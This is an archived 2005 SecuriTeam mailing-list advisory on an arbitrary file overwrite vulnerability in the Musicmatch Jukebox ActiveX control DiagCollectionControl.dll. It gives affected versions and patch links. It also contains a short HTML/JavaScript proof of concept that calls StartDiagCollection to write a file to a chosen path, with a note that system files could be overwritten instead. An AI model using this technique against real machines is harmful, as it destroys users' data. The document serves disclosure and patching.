[NT] Yahoo Musicmatch Remote File Inclusion

• Previous message: SecuriTeam: "[REVS] Introduction to HTTP Response Splitting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 19 Apr 2005 15:11:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Yahoo Musicmatch Remote File Inclusion
------------------------------------------------------------------------

SUMMARY

" <http://musicmatch.com/> Musicmatch Jukebox 10 is the most powerful way
to find and organize your music, giving you ultimate control of your music
experience. With a whole new range of library, playlist, and portable
device controls, Musicmatch Jukebox is more powerful and easier to use
than ever before." In September 2004 Musicmatch was purchased by Yahoo!
Inc.

Lack of parameters validation in Musicmatch ActiveX allows remote user to
write files on the vulnerable systems.

DETAILS

Vulnerable Systems:
 * Musicmatch versions 10.00.2047 and prior
 * Musicmatch versions 9.00.5059 and prior (according to vendor)

Immune Systems:
 * Musicmatch versions 9 and 10 (fixed versions since 03/21/05)

DiagCollectionControl.dll is an ActiveX control which contains a Safe for
Scripting Interface with a method called StartDiagCollection with the
following definition:
Dispatch Function BOOL StartDiagCollection(BSTR bstrSavePath, BSTR
bstrUserEnteredInfo, BSTR bstrXMLControlFile, USERDEFINED eRequestType,
BOOL bUploadInfo, BOOL bEncryptZipFile, TR numJobs )

In this particular vulnerability, an attacker can pass in a malicious
value into bstrSavePath (eg: c:\\boot.ini). Once that method is called,
whichever file is specified will get overwritten.

Exploit:
The following is a non-malicious example:
< h1>If you have a vulnerable version a file "foo.txt" has been written to
the folder "c:\exploit".< br>
< br>It could have been used to overwrite critical system files.</h1>
< script>
var foo;
foo = new ActiveXObject("DiagCollectionControl.DiagCollectionA.1");
foo.StartDiagCollection("c:\\exploit\\foo.txt", "userinfo", "", 1, true,
false, "1");
< /script>

If you have the vulnerable ActiveX control, a file, foo.txt will be
created in the c:\exploit directory. Obviously, much worse can be done as
there is no restrictions to what files can be overwritten assuming the
user has access to them. It may be possible to control the data that goes
into the file as well, although I have not yet identified a method for
doing this.

Patch Availability:
The following links can be used to find more information on the patch and
the vulnerability: <http://www.musicmatch.com/download/free/security.htm>
Musicmatch Jukebox Security Updates,
<http://www.musicmatch.com/info/user_guide/faq/security_updates.htm>
Security FAQ.

ADDITIONAL INFORMATION

The information has been provided by <mailto:robfly@hyperdose.com> Robert
Fly.
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-02.txt>
http://www.hyperdose.com/advisories/H2005-02.txt
The original article can be found at:
<http://www.hyperdose.com/advisories/H2005-03.txt>
http://www.hyperdose.com/advisories/H2005-03.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[REVS] Introduction to HTTP Response Splitting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-disclosure] iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL Activ ... Remote exploitation of an access control vulnerability in McAfee ... Security Center allows attackers to create or overwrite arbitrary ... The vulnerability specifically exists due to a registered ActiveX ... (Full-Disclosure) iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwr ... Remote exploitation of an access control vulnerability in McAfee ... Security Center allows attackers to create or overwrite arbitrary ... The vulnerability specifically exists due to a registered ActiveX ... (Bugtraq) [VulnWatch] iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control ... Remote exploitation of an access control vulnerability in McAfee ... Security Center allows attackers to create or overwrite arbitrary ... The vulnerability specifically exists due to a registered ActiveX ... (VulnWatch) Trusted Site Cross Site Scripting Elevation of Privilege in Musicmatch ... Hyperdose Security Advisory ... Trusted Site Cross Site Scripting Elevation of Privilege in Musicmatch ... In September 04 Musicmatch was purchased by Yahoo! ... Trusted Sites zone which is a smart move. ... (Bugtraq) Arbitrary file overwrite possible by Musicmatch ActiveX control ... Hyperdose Security Advisory ... Arbitrary file overwrite in Musicmatch ... In this particular vulnerability, an attacker can pass in a malicious value ... (Bugtraq)